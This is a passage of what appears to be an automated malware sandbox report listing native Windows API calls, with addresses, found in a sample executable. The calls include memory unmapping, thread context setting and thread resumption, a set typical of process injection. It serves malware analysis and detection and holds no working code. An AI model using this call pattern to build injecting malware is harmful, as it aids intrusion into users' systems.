          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_004186A0 NtReadFile
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_00418720 NtClose
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_004187D0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_004185EB NtCreateFile
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0041871A NtClose
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_004187CA NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013099A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013095D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013098F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013097A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013096E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0130AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309560 NtWriteFile
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309950 NtQueueApcThread
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013095F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013099D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309820 NtEnumerateKey
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0130B040 NtSuspendThread
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_013098A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0130A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309B00 NtSetValueKey
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309770 NtSetInformationFile
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0130A770 NtOpenThread
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309760 NtOpenProcess
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_0130A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309A10 NtQuerySection
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 3_2_01309670 NtQueryInformationProcess
          Source: C:\Users\use